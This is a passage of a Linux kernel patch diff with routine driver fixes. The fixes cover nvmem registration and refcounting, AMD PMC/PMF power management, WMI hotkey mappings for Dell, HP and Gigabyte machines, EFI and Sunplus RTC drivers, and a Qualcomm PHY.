+@@ -770,31 +770,32 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 		return ERR_PTR(rval);
+ 	}
+ 
+-	if (config->wp_gpio)
+-		nvmem->wp_gpio = config->wp_gpio;
+-	else if (!config->ignore_wp)
++	nvmem->id = rval;
++
++	nvmem->dev.type = &nvmem_provider_type;
++	nvmem->dev.bus = &nvmem_bus_type;
++	nvmem->dev.parent = config->dev;
++
++	device_initialize(&nvmem->dev);
++
++	if (!config->ignore_wp)
+ 		nvmem->wp_gpio = gpiod_get_optional(config->dev, "wp",
+ 						    GPIOD_OUT_HIGH);
+ 	if (IS_ERR(nvmem->wp_gpio)) {
+-		ida_free(&nvmem_ida, nvmem->id);
+ 		rval = PTR_ERR(nvmem->wp_gpio);
+-		kfree(nvmem);
+-		return ERR_PTR(rval);
++		nvmem->wp_gpio = NULL;
++		goto err_put_device;
+ 	}
+ 
+ 	kref_init(&nvmem->refcnt);
+ 	INIT_LIST_HEAD(&nvmem->cells);
+ 
+-	nvmem->id = rval;
+ 	nvmem->owner = config->owner;
+ 	if (!nvmem->owner && config->dev->driver)
+ 		nvmem->owner = config->dev->driver->owner;
+ 	nvmem->stride = config->stride ?: 1;
+ 	nvmem->word_size = config->word_size ?: 1;
+ 	nvmem->size = config->size;
+-	nvmem->dev.type = &nvmem_provider_type;
+-	nvmem->dev.bus = &nvmem_bus_type;
+-	nvmem->dev.parent = config->dev;
+ 	nvmem->root_only = config->root_only;
+ 	nvmem->priv = config->priv;
+ 	nvmem->type = config->type;
+@@ -822,11 +823,8 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 		break;
+ 	}
+ 
+-	if (rval) {
+-		ida_free(&nvmem_ida, nvmem->id);
+-		kfree(nvmem);
+-		return ERR_PTR(rval);
+-	}
++	if (rval)
++		goto err_put_device;
+ 
+ 	nvmem->read_only = device_property_present(config->dev, "read-only") ||
+ 			   config->read_only || !nvmem->reg_write;
+@@ -835,28 +833,22 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 	nvmem->dev.groups = nvmem_dev_groups;
+ #endif
+ 
+-	dev_dbg(&nvmem->dev, "Registering nvmem device %s\n", config->name);
+-
+-	rval = device_register(&nvmem->dev);
+-	if (rval)
+-		goto err_put_device;
+-
+ 	if (nvmem->nkeepout) {
+ 		rval = nvmem_validate_keepouts(nvmem);
+ 		if (rval)
+-			goto err_device_del;
++			goto err_put_device;
+ 	}
+ 
+ 	if (config->compat) {
+ 		rval = nvmem_sysfs_setup_compat(nvmem, config);
+ 		if (rval)
+-			goto err_device_del;
++			goto err_put_device;
+ 	}
+ 
+ 	if (config->cells) {
+ 		rval = nvmem_add_cells(nvmem, config->cells, config->ncells);
+ 		if (rval)
+-			goto err_teardown_compat;
++			goto err_remove_cells;
+ 	}
+ 
+ 	rval = nvmem_add_cells_from_table(nvmem);
+@@ -867,17 +859,20 @@ struct nvmem_device *nvmem_register(const struct nvmem_config *config)
+ 	if (rval)
+ 		goto err_remove_cells;
+ 
++	dev_dbg(&nvmem->dev, "Registering nvmem device %s\n", config->name);
++
++	rval = device_add(&nvmem->dev);
++	if (rval)
++		goto err_remove_cells;
++
+ 	blocking_notifier_call_chain(&nvmem_notifier, NVMEM_ADD, nvmem);
+ 
+ 	return nvmem;
+ 
+ err_remove_cells:
+ 	nvmem_device_remove_all_cells(nvmem);
+-err_teardown_compat:
+ 	if (config->compat)
+ 		nvmem_sysfs_remove_compat(nvmem, config);
+-err_device_del:
+-	device_del(&nvmem->dev);
+ err_put_device:
+ 	put_device(&nvmem->dev);
+ 
+@@ -1242,16 +1237,21 @@ struct nvmem_cell *of_nvmem_cell_get(struct device_node *np, const char *id)
+ 	if (!cell_np)
+ 		return ERR_PTR(-ENOENT);
+ 
+-	nvmem_np = of_get_next_parent(cell_np);
+-	if (!nvmem_np)
++	nvmem_np = of_get_parent(cell_np);
++	if (!nvmem_np) {
++		of_node_put(cell_np);
+ 		return ERR_PTR(-EINVAL);
++	}
+ 
+ 	nvmem = __nvmem_device_get(nvmem_np, device_match_of_node);
+ 	of_node_put(nvmem_np);
+-	if (IS_ERR(nvmem))
++	if (IS_ERR(nvmem)) {
++		of_node_put(cell_np);
+ 		return ERR_CAST(nvmem);
++	}
+ 
+ 	cell_entry = nvmem_find_cell_entry_by_node(nvmem, cell_np);
++	of_node_put(cell_np);
+ 	if (!cell_entry) {
+ 		__nvmem_device_put(nvmem);
+ 		return ERR_PTR(-ENOENT);
+diff --git a/drivers/nvmem/qcom-spmi-sdam.c b/drivers/nvmem/qcom-spmi-sdam.c
+index 4fcb63507ecd1..8499892044b7b 100644
+--- a/drivers/nvmem/qcom-spmi-sdam.c
++++ b/drivers/nvmem/qcom-spmi-sdam.c
+@@ -166,6 +166,7 @@ static const struct of_device_id sdam_match_table[] = {
+ 	{ .compatible = "qcom,spmi-sdam" },
+ 	{},
+ };
++MODULE_DEVICE_TABLE(of, sdam_match_table);
+ 
+ static struct platform_driver sdam_driver = {
+ 	.driver = {
+diff --git a/drivers/nvmem/sunxi_sid.c b/drivers/nvmem/sunxi_sid.c
+index 5750e1f4bcdbb..92dfe4cb10e38 100644
+--- a/drivers/nvmem/sunxi_sid.c
++++ b/drivers/nvmem/sunxi_sid.c
+@@ -41,8 +41,21 @@ static int sunxi_sid_read(void *context, unsigned int offset,
+ 			  void *val, size_t bytes)
+ {
+ 	struct sunxi_sid *sid = context;
++	u32 word;
++
++	/* .stride = 4 so offset is guaranteed to be aligned */
++	__ioread32_copy(val, sid->base + sid->value_offset + offset, bytes / 4);
+ 
+-	memcpy_fromio(val, sid->base + sid->value_offset + offset, bytes);
++	val += round_down(bytes, 4);
++	offset += round_down(bytes, 4);
++	bytes = bytes % 4;
++
++	if (!bytes)
++		return 0;
++
++	/* Handle any trailing bytes */
++	word = readl_relaxed(sid->base + sid->value_offset + offset);
++	memcpy(val, &word, bytes);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/of/fdt.c b/drivers/of/fdt.c
+index f08b25195ae79..d1a68b6d03b3f 100644
+--- a/drivers/of/fdt.c
++++ b/drivers/of/fdt.c
+@@ -26,7 +26,6 @@
+ #include <linux/serial_core.h>
+ #include <linux/sysfs.h>
+ #include <linux/random.h>
+-#include <linux/kmemleak.h>
+ 
+ #include <asm/setup.h>  /* for COMMAND_LINE_SIZE */
+ #include <asm/page.h>
+@@ -525,12 +524,9 @@ static int __init __reserved_mem_reserve_reg(unsigned long node,
+ 		size = dt_mem_next_cell(dt_root_size_cells, &prop);
+ 
+ 		if (size &&
+-		    early_init_dt_reserve_memory(base, size, nomap) == 0) {
++		    early_init_dt_reserve_memory(base, size, nomap) == 0)
+ 			pr_debug("Reserved memory: reserved region for node '%s': base %pa, size %lu MiB\n",
+ 				uname, &base, (unsigned long)(size / SZ_1M));
+-			if (!nomap)
+-				kmemleak_alloc_phys(base, size, 0);
+-		}
+ 		else
+ 			pr_err("Reserved memory: failed to reserve memory for node '%s': base %pa, size %lu MiB\n",
+ 			       uname, &base, (unsigned long)(size / SZ_1M));
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index adcda7762acf5..816829105135e 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -2296,15 +2296,11 @@ static void qmp_combo_disable_autonomous_mode(struct qmp_phy *qphy)
+ static int __maybe_unused qmp_combo_runtime_suspend(struct device *dev)
+ {
+ 	struct qcom_qmp *qmp = dev_get_drvdata(dev);
+-	struct qmp_phy *qphy = qmp->phys[0];
++	struct qmp_phy *qphy = qmp->usb_phy;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+ 
+ 	dev_vdbg(dev, "Suspending QMP phy, mode:%d\n", qphy->mode);
+ 
+-	/* Supported only for USB3 PHY and luckily USB3 is the first phy */
+-	if (cfg->type != PHY_TYPE_USB3)
+-		return 0;
+-
+ 	if (!qmp->init_count) {
+ 		dev_vdbg(dev, "PHY not initialized, bailing out\n");
+ 		return 0;
+@@ -2321,16 +2317,12 @@ static int __maybe_unused qmp_combo_runtime_suspend(struct device *dev)
+ static int __maybe_unused qmp_combo_runtime_resume(struct device *dev)
+ {
+ 	struct qcom_qmp *qmp = dev_get_drvdata(dev);
+-	struct qmp_phy *qphy = qmp->phys[0];
++	struct qmp_phy *qphy = qmp->usb_phy;
+ 	const struct qmp_phy_cfg *cfg = qphy->cfg;
+ 	int ret = 0;
+ 
+ 	dev_vdbg(dev, "Resuming QMP phy, mode:%d\n", qphy->mode);
+ 
+-	/* Supported only for USB3 PHY and luckily USB3 is the first phy */
+-	if (cfg->type != PHY_TYPE_USB3)
+-		return 0;
+-
+ 	if (!qmp->init_count) {
+ 		dev_vdbg(dev, "PHY not initialized, bailing out\n");
+ 		return 0;
+diff --git a/drivers/platform/x86/amd/Kconfig b/drivers/platform/x86/amd/Kconfig
+index a825af8126c83..2ce8cb2170dfc 100644
+--- a/drivers/platform/x86/amd/Kconfig
++++ b/drivers/platform/x86/amd/Kconfig
+@@ -8,6 +8,7 @@ source "drivers/platform/x86/amd/pmf/Kconfig"
+ config AMD_PMC
+ 	tristate "AMD SoC PMC driver"
+ 	depends on ACPI && PCI && RTC_CLASS
++	select SERIO
+ 	help
+ 	  The driver provides support for AMD Power Management Controller
+ 	  primarily responsible for S2Idle transactions that are driven from
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index 8d924986381be..be1b49824edbd 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -22,6 +22,7 @@
+ #include <linux/pci.h>
+ #include <linux/platform_device.h>
+ #include <linux/rtc.h>
++#include <linux/serio.h>
+ #include <linux/suspend.h>
+ #include <linux/seq_file.h>
+ #include <linux/uaccess.h>
+@@ -653,6 +654,33 @@ static int amd_pmc_get_os_hint(struct amd_pmc_dev *dev)
+ 	return -EINVAL;
+ }
+ 
++static int amd_pmc_czn_wa_irq1(struct amd_pmc_dev *pdev)
++{
++	struct device *d;
++	int rc;
++
++	if (!pdev->major) {
++		rc = amd_pmc_get_smu_version(pdev);
++		if (rc)
++			return rc;
++	}
++
++	if (pdev->major > 64 || (pdev->major == 64 && pdev->minor > 65))
++		return 0;
++
++	d = bus_find_device_by_name(&serio_bus, NULL, "serio0");
++	if (!d)
++		return 0;
++	if (device_may_wakeup(d)) {
++		dev_info_once(d, "Disabling IRQ1 wakeup source to avoid platform firmware bug\n");
++		disable_irq_wake(1);
++		device_set_wakeup_enable(d, false);
++	}
++	put_device(d);
++
++	return 0;
++}
++
+ static int amd_pmc_verify_czn_rtc(struct amd_pmc_dev *pdev, u32 *arg)
+ {
+ 	struct rtc_device *rtc_device;
+@@ -782,6 +810,25 @@ static struct acpi_s2idle_dev_ops amd_pmc_s2idle_dev_ops = {
+ 	.check = amd_pmc_s2idle_check,
+ 	.restore = amd_pmc_s2idle_restore,
+ };
++
++static int __maybe_unused amd_pmc_suspend_handler(struct device *dev)
++{
++	struct amd_pmc_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->cpu_id == AMD_CPU_ID_CZN) {
++		int rc = amd_pmc_czn_wa_irq1(pdev);
++
++		if (rc) {
++			dev_err(pdev->dev, "failed to adjust keyboard wakeup: %d\n", rc);
++			return rc;
++		}
++	}
++
++	return 0;
++}
++
++static SIMPLE_DEV_PM_OPS(amd_pmc_pm, amd_pmc_suspend_handler, NULL);
++
+ #endif
+ 
+ static const struct pci_device_id pmc_pci_ids[] = {
+@@ -980,6 +1027,9 @@ static struct platform_driver amd_pmc_driver = {
+ 		.name = "amd_pmc",
+ 		.acpi_match_table = amd_pmc_acpi_ids,
+ 		.dev_groups = pmc_groups,
++#ifdef CONFIG_SUSPEND
++		.pm = &amd_pmc_pm,
++#endif
+ 	},
+ 	.probe = amd_pmc_probe,
+ 	.remove = amd_pmc_remove,
+diff --git a/drivers/platform/x86/amd/pmf/auto-mode.c b/drivers/platform/x86/amd/pmf/auto-mode.c
+index 644af42e07cf8..96a8e1832c05e 100644
+--- a/drivers/platform/x86/amd/pmf/auto-mode.c
++++ b/drivers/platform/x86/amd/pmf/auto-mode.c
+@@ -275,13 +275,8 @@ int amd_pmf_reset_amt(struct amd_pmf_dev *dev)
+ 	 */
+ 
+ 	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
+-		int mode = amd_pmf_get_pprof_modes(dev);
+-
+-		if (mode < 0)
+-			return mode;
+-
+ 		dev_dbg(dev->dev, "resetting AMT thermals\n");
+-		amd_pmf_update_slider(dev, SLIDER_OP_SET, mode, NULL);
++		amd_pmf_set_sps_power_limits(dev);
+ 	}
+ 	return 0;
+ }
+@@ -299,7 +294,5 @@ void amd_pmf_deinit_auto_mode(struct amd_pmf_dev *dev)
+ void amd_pmf_init_auto_mode(struct amd_pmf_dev *dev)
+ {
+ 	amd_pmf_load_defaults_auto_mode(dev);
+-	/* update the thermal limits for Automode */
+-	amd_pmf_set_automode(dev, config_store.current_mode, NULL);
+ 	amd_pmf_init_metrics_table(dev);
+ }
+diff --git a/drivers/platform/x86/amd/pmf/cnqf.c b/drivers/platform/x86/amd/pmf/cnqf.c
+index 668c7c0fea831..f39275ec5cc94 100644
+--- a/drivers/platform/x86/amd/pmf/cnqf.c
++++ b/drivers/platform/x86/amd/pmf/cnqf.c
+@@ -103,7 +103,7 @@ int amd_pmf_trans_cnqf(struct amd_pmf_dev *dev, int socket_power, ktime_t time_l
+ 
+ 	src = amd_pmf_cnqf_get_power_source(dev);
+ 
+-	if (dev->current_profile == PLATFORM_PROFILE_BALANCED) {
++	if (is_pprof_balanced(dev)) {
+ 		amd_pmf_set_cnqf(dev, src, config_store.current_mode, NULL);
+ 	} else {
+ 		/*
+@@ -307,13 +307,9 @@ static ssize_t cnqf_enable_store(struct device *dev,
+ 				 const char *buf, size_t count)
+ {
+ 	struct amd_pmf_dev *pdev = dev_get_drvdata(dev);
+-	int mode, result, src;
++	int result, src;
+ 	bool input;
+ 
+-	mode = amd_pmf_get_pprof_modes(pdev);
+-	if (mode < 0)
+-		return mode;
+-
+ 	result = kstrtobool(buf, &input);
+ 	if (result)
+ 		return result;
+@@ -321,11 +317,11 @@ static ssize_t cnqf_enable_store(struct device *dev,
+ 	src = amd_pmf_cnqf_get_power_source(pdev);
+ 	pdev->cnqf_enabled = input;
+ 
+-	if (pdev->cnqf_enabled && pdev->current_profile == PLATFORM_PROFILE_BALANCED) {
++	if (pdev->cnqf_enabled && is_pprof_balanced(pdev)) {
+ 		amd_pmf_set_cnqf(pdev, src, config_store.current_mode, NULL);
+ 	} else {
+ 		if (is_apmf_func_supported(pdev, APMF_FUNC_STATIC_SLIDER_GRANULAR))
+-			amd_pmf_update_slider(pdev, SLIDER_OP_SET, mode, NULL);
++			amd_pmf_set_sps_power_limits(pdev);
+ 	}
+ 
+ 	dev_dbg(pdev->dev, "Received CnQF %s\n", input ? "on" : "off");
+@@ -386,7 +382,7 @@ int amd_pmf_init_cnqf(struct amd_pmf_dev *dev)
+ 	dev->cnqf_enabled = amd_pmf_check_flags(dev);
+ 
+ 	/* update the thermal for CnQF */
+-	if (dev->cnqf_enabled && dev->current_profile == PLATFORM_PROFILE_BALANCED) {
++	if (dev->cnqf_enabled && is_pprof_balanced(dev)) {
+ 		src = amd_pmf_cnqf_get_power_source(dev);
+ 		amd_pmf_set_cnqf(dev, src, config_store.current_mode, NULL);
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index a5f5a4bcff6d9..da23639071d79 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -58,6 +58,25 @@ static bool force_load;
+ module_param(force_load, bool, 0444);
+ MODULE_PARM_DESC(force_load, "Force load this driver on supported older platforms (experimental)");
+ 
++static int amd_pmf_pwr_src_notify_call(struct notifier_block *nb, unsigned long event, void *data)
++{
++	struct amd_pmf_dev *pmf = container_of(nb, struct amd_pmf_dev, pwr_src_notifier);
++
++	if (event != PSY_EVENT_PROP_CHANGED)
++		return NOTIFY_OK;
++
++	if (is_apmf_func_supported(pmf, APMF_FUNC_AUTO_MODE) ||
++	    is_apmf_func_supported(pmf, APMF_FUNC_DYN_SLIDER_DC) ||
++	    is_apmf_func_supported(pmf, APMF_FUNC_DYN_SLIDER_AC)) {
++		if ((pmf->amt_enabled || pmf->cnqf_enabled) && is_pprof_balanced(pmf))
++			return NOTIFY_DONE;
++	}
++
++	amd_pmf_set_sps_power_limits(pmf);
++
++	return NOTIFY_OK;
++}
++
+ static int current_power_limits_show(struct seq_file *seq, void *unused)
+ {
+ 	struct amd_pmf_dev *dev = seq->private;
+@@ -366,14 +385,18 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	if (!dev->regbase)
+ 		return -ENOMEM;
+ 
++	mutex_init(&dev->lock);
++	mutex_init(&dev->update_mutex);
++
+ 	apmf_acpi_init(dev);
+ 	platform_set_drvdata(pdev, dev);
+ 	amd_pmf_init_features(dev);
+ 	apmf_install_handler(dev);
+ 	amd_pmf_dbgfs_register(dev);
+ 
+-	mutex_init(&dev->lock);
+-	mutex_init(&dev->update_mutex);
++	dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
++	power_supply_reg_notifier(&dev->pwr_src_notifier);
++
+ 	dev_info(dev->dev, "registered PMF device successfully\n");
+ 
+ 	return 0;
+@@ -383,11 +406,12 @@ static int amd_pmf_remove(struct platform_device *pdev)
+ {
+ 	struct amd_pmf_dev *dev = platform_get_drvdata(pdev);
+ 
+-	mutex_destroy(&dev->lock);
+-	mutex_destroy(&dev->update_mutex);
++	power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 	amd_pmf_deinit_features(dev);
+ 	apmf_acpi_deinit(dev);
+ 	amd_pmf_dbgfs_unregister(dev);
++	mutex_destroy(&dev->lock);
++	mutex_destroy(&dev->update_mutex);
+ 	kfree(dev->buf);
+ 	return 0;
+ }
+diff --git a/drivers/platform/x86/amd/pmf/pmf.h b/drivers/platform/x86/amd/pmf/pmf.h
+index 84bbe2c6ea612..06c30cdc05733 100644
+--- a/drivers/platform/x86/amd/pmf/pmf.h
++++ b/drivers/platform/x86/amd/pmf/pmf.h
+@@ -169,6 +169,7 @@ struct amd_pmf_dev {
+ 	struct mutex update_mutex; /* protects race between ACPI handler and metrics thread */
+ 	bool cnqf_enabled;
+ 	bool cnqf_supported;
++	struct notifier_block pwr_src_notifier;
+ };
+ 
+ struct apmf_sps_prop_granular {
+@@ -391,9 +392,11 @@ int amd_pmf_init_sps(struct amd_pmf_dev *dev);
+ void amd_pmf_deinit_sps(struct amd_pmf_dev *dev);
+ int apmf_get_static_slider_granular(struct amd_pmf_dev *pdev,
+ 				    struct apmf_static_slider_granular_output *output);
++bool is_pprof_balanced(struct amd_pmf_dev *pmf);
+ 
+ 
+ int apmf_update_fan_idx(struct amd_pmf_dev *pdev, bool manual, u32 idx);
++int amd_pmf_set_sps_power_limits(struct amd_pmf_dev *pmf);
+ 
+ /* Auto Mode Layer */
+ int apmf_get_auto_mode_def(struct amd_pmf_dev *pdev, struct apmf_auto_mode *data);
+diff --git a/drivers/platform/x86/amd/pmf/sps.c b/drivers/platform/x86/amd/pmf/sps.c
+index dba7e36962dc1..bed762d47a14a 100644
+--- a/drivers/platform/x86/amd/pmf/sps.c
++++ b/drivers/platform/x86/amd/pmf/sps.c
+@@ -70,6 +70,24 @@ void amd_pmf_update_slider(struct amd_pmf_dev *dev, bool op, int idx,
+ 	}
+ }
+ 
++int amd_pmf_set_sps_power_limits(struct amd_pmf_dev *pmf)
++{
++	int mode;
++
++	mode = amd_pmf_get_pprof_modes(pmf);
++	if (mode < 0)
++		return mode;
++
++	amd_pmf_update_slider(pmf, SLIDER_OP_SET, mode, NULL);
++
++	return 0;
++}
++
++bool is_pprof_balanced(struct amd_pmf_dev *pmf)
++{
++	return (pmf->current_profile == PLATFORM_PROFILE_BALANCED) ? true : false;
++}
++
+ static int amd_pmf_profile_get(struct platform_profile_handler *pprof,
+ 			       enum platform_profile_option *profile)
+ {
+@@ -105,15 +123,10 @@ static int amd_pmf_profile_set(struct platform_profile_handler *pprof,
+ 			       enum platform_profile_option profile)
+ {
+ 	struct amd_pmf_dev *pmf = container_of(pprof, struct amd_pmf_dev, pprof);
+-	int mode;
+ 
+ 	pmf->current_profile = profile;
+-	mode = amd_pmf_get_pprof_modes(pmf);
+-	if (mode < 0)
+-		return mode;
+ 
+-	amd_pmf_update_slider(pmf, SLIDER_OP_SET, mode, NULL);
+-	return 0;
++	return amd_pmf_set_sps_power_limits(pmf);
+ }
+ 
+ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+@@ -123,6 +136,9 @@ int amd_pmf_init_sps(struct amd_pmf_dev *dev)
+ 	dev->current_profile = PLATFORM_PROFILE_BALANCED;
+ 	amd_pmf_load_defaults_sps(dev);
+ 
++	/* update SPS balanced power mode thermals */
++	amd_pmf_set_sps_power_limits(dev);
++
+ 	dev->pprof.profile_get = amd_pmf_profile_get;
+ 	dev->pprof.profile_set = amd_pmf_profile_set;
+ 
+diff --git a/drivers/platform/x86/dell/dell-wmi-base.c b/drivers/platform/x86/dell/dell-wmi-base.c
+index 0a259a27459f6..502783a7adb11 100644
+--- a/drivers/platform/x86/dell/dell-wmi-base.c
++++ b/drivers/platform/x86/dell/dell-wmi-base.c
+@@ -261,6 +261,9 @@ static const struct key_entry dell_wmi_keymap_type_0010[] = {
+ 	{ KE_KEY,    0x57, { KEY_BRIGHTNESSDOWN } },
+ 	{ KE_KEY,    0x58, { KEY_BRIGHTNESSUP } },
+ 
++	/*Speaker Mute*/
++	{ KE_KEY, 0x109, { KEY_MUTE} },
++
+ 	/* Mic mute */
+ 	{ KE_KEY, 0x150, { KEY_MICMUTE } },
+ 
+diff --git a/drivers/platform/x86/gigabyte-wmi.c b/drivers/platform/x86/gigabyte-wmi.c
+index 5e7e6659a8497..322cfaeda17ba 100644
+--- a/drivers/platform/x86/gigabyte-wmi.c
++++ b/drivers/platform/x86/gigabyte-wmi.c
+@@ -141,6 +141,7 @@ static u8 gigabyte_wmi_detect_sensor_usability(struct wmi_device *wdev)
+ 
+ static const struct dmi_system_id gigabyte_wmi_known_working_platforms[] = {
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H-CF"),
++	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M DS3H WIFI-CF"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B450M S2H V2"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550 AORUS ELITE AX V2"),
+ 	DMI_EXACT_MATCH_GIGABYTE_BOARD_NAME("B550 AORUS ELITE"),
+diff --git a/drivers/platform/x86/hp-wmi.c b/drivers/platform/x86/hp-wmi.c
+index 0a99058be8130..4a3851332ef2c 100644
+--- a/drivers/platform/x86/hp-wmi.c
++++ b/drivers/platform/x86/hp-wmi.c
+@@ -90,6 +90,7 @@ enum hp_wmi_event_ids {
+ 	HPWMI_PEAKSHIFT_PERIOD		= 0x0F,
+ 	HPWMI_BATTERY_CHARGE_PERIOD	= 0x10,
+ 	HPWMI_SANITIZATION_MODE		= 0x17,
++	HPWMI_OMEN_KEY			= 0x1D,
+ 	HPWMI_SMART_EXPERIENCE_APP	= 0x21,
+ };
+ 
+@@ -216,6 +217,8 @@ static const struct key_entry hp_wmi_keymap[] = {
+ 	{ KE_KEY, 0x213b,  { KEY_INFO } },
+ 	{ KE_KEY, 0x2169,  { KEY_ROTATE_DISPLAY } },
+ 	{ KE_KEY, 0x216a,  { KEY_SETUP } },
++	{ KE_KEY, 0x21a5,  { KEY_PROG2 } }, /* HP Omen Key */
++	{ KE_KEY, 0x21a7,  { KEY_FN_ESC } },
+ 	{ KE_KEY, 0x21a9,  { KEY_TOUCHPAD_OFF } },
+ 	{ KE_KEY, 0x121a9, { KEY_TOUCHPAD_ON } },
+ 	{ KE_KEY, 0x231b,  { KEY_HELP } },
+@@ -810,6 +813,7 @@ static void hp_wmi_notify(u32 value, void *context)
+ 	case HPWMI_SMART_ADAPTER:
+ 		break;
+ 	case HPWMI_BEZEL_BUTTON:
++	case HPWMI_OMEN_KEY:
+ 		key_code = hp_wmi_read_int(HPWMI_HOTKEY_QUERY);
+ 		if (key_code < 0)
+ 			break;
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 7fd735c67a8e6..2a48a2d880d86 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -5566,7 +5566,7 @@ static int light_sysfs_set(struct led_classdev *led_cdev,
+ 
+ static enum led_brightness light_sysfs_get(struct led_classdev *led_cdev)
+ {
+-	return (light_get_status() == 1) ? LED_FULL : LED_OFF;
++	return (light_get_status() == 1) ? LED_ON : LED_OFF;
+ }
+ 
+ static struct tpacpi_led_classdev tpacpi_led_thinklight = {
+diff --git a/drivers/rtc/rtc-efi.c b/drivers/rtc/rtc-efi.c
+index 11850c2880ad4..491b830d08183 100644
+--- a/drivers/rtc/rtc-efi.c
++++ b/drivers/rtc/rtc-efi.c
+@@ -188,9 +188,10 @@ static int efi_set_time(struct device *dev, struct rtc_time *tm)
+ 
+ static int efi_procfs(struct device *dev, struct seq_file *seq)
+ {
+-	efi_time_t      eft, alm;
+-	efi_time_cap_t  cap;
+-	efi_bool_t      enabled, pending;
++	efi_time_t        eft, alm;
++	efi_time_cap_t    cap;
++	efi_bool_t        enabled, pending;
++	struct rtc_device *rtc = dev_get_drvdata(dev);
+ 
+ 	memset(&eft, 0, sizeof(eft));
+ 	memset(&alm, 0, sizeof(alm));
+@@ -213,23 +214,25 @@ static int efi_procfs(struct device *dev, struct seq_file *seq)
+ 		/* XXX fixme: convert to string? */
+ 		seq_printf(seq, "Timezone\t: %u\n", eft.timezone);
+ 
+-	seq_printf(seq,
+-		   "Alarm Time\t: %u:%u:%u.%09u\n"
+-		   "Alarm Date\t: %u-%u-%u\n"
+-		   "Alarm Daylight\t: %u\n"
+-		   "Enabled\t\t: %s\n"
+-		   "Pending\t\t: %s\n",
+-		   alm.hour, alm.minute, alm.second, alm.nanosecond,
+-		   alm.year, alm.month, alm.day,
+-		   alm.daylight,
+-		   enabled == 1 ? "yes" : "no",
+-		   pending == 1 ? "yes" : "no");
+-
+-	if (eft.timezone == EFI_UNSPECIFIED_TIMEZONE)
+-		seq_puts(seq, "Timezone\t: unspecified\n");
+-	else
+-		/* XXX fixme: convert to string? */
+-		seq_printf(seq, "Timezone\t: %u\n", alm.timezone);
++	if (test_bit(RTC_FEATURE_ALARM, rtc->features)) {
++		seq_printf(seq,
++			   "Alarm Time\t: %u:%u:%u.%09u\n"
++			   "Alarm Date\t: %u-%u-%u\n"
++			   "Alarm Daylight\t: %u\n"
++			   "Enabled\t\t: %s\n"
++			   "Pending\t\t: %s\n",
++			   alm.hour, alm.minute, alm.second, alm.nanosecond,
++			   alm.year, alm.month, alm.day,
++			   alm.daylight,
++			   enabled == 1 ? "yes" : "no",
++			   pending == 1 ? "yes" : "no");
++
++		if (eft.timezone == EFI_UNSPECIFIED_TIMEZONE)
++			seq_puts(seq, "Timezone\t: unspecified\n");
++		else
++			/* XXX fixme: convert to string? */
++			seq_printf(seq, "Timezone\t: %u\n", alm.timezone);
++	}
+ 
+ 	/*
+ 	 * now prints the capabilities
+@@ -269,7 +272,10 @@ static int __init efi_rtc_probe(struct platform_device *dev)
+ 
+ 	rtc->ops = &efi_rtc_ops;
+ 	clear_bit(RTC_FEATURE_UPDATE_INTERRUPT, rtc->features);
+-	set_bit(RTC_FEATURE_ALARM_WAKEUP_ONLY, rtc->features);
++	if (efi_rt_services_supported(EFI_RT_SUPPORTED_WAKEUP_SERVICES))
++		set_bit(RTC_FEATURE_ALARM_WAKEUP_ONLY, rtc->features);
++	else
++		clear_bit(RTC_FEATURE_ALARM, rtc->features);
+ 
+ 	return devm_rtc_register_device(rtc);
+ }
+diff --git a/drivers/rtc/rtc-sunplus.c b/drivers/rtc/rtc-sunplus.c
+index e8e2ab1103fc0..4b578e4d44f6a 100644
+--- a/drivers/rtc/rtc-sunplus.c
++++ b/drivers/rtc/rtc-sunplus.c
+@@ -240,8 +240,8 @@ static int sp_rtc_probe(struct platform_device *plat_dev)
+ 	if (IS_ERR(sp_rtc->reg_base))
+ 		return dev_err_probe(&plat_dev->dev, PTR_ERR(sp_rtc->reg_base),
+ 					    "%s devm_ioremap_resource fail\n", RTC_REG_NAME);
+-	dev_dbg(&plat_dev->dev, "res = 0x%x, reg_base = 0x%lx\n",
+-		sp_rtc->res->start, (unsigned long)sp_rtc->reg_base);
++	dev_dbg(&plat_dev->dev, "res = %pR, reg_base = %p\n",
++		sp_rtc->res, sp_rtc->reg_base);
+ 
+ 	sp_rtc->irq = platform_get_irq(plat_dev, 0);
+ 	if (sp_rtc->irq < 0)
+diff --git a/drivers/s390/char/zcore.c b/drivers/s390/char/zcore.c
+index 6165e6aae762a..a41833557d550 100644
+--- a/drivers/s390/char/zcore.c
++++ b/drivers/s390/char/zcore.c
+@@ -103,7 +103,7 @@ static inline int memcpy_hsa_kernel(void *dst, unsigned long src, size_t count)
+ 
+ 	kvec.iov_base = dst;
+ 	kvec.iov_len = count;
+-	iov_iter_kvec(&iter, WRITE, &kvec, 1, count);
++	iov_iter_kvec(&iter, ITER_DEST, &kvec, 1, count);
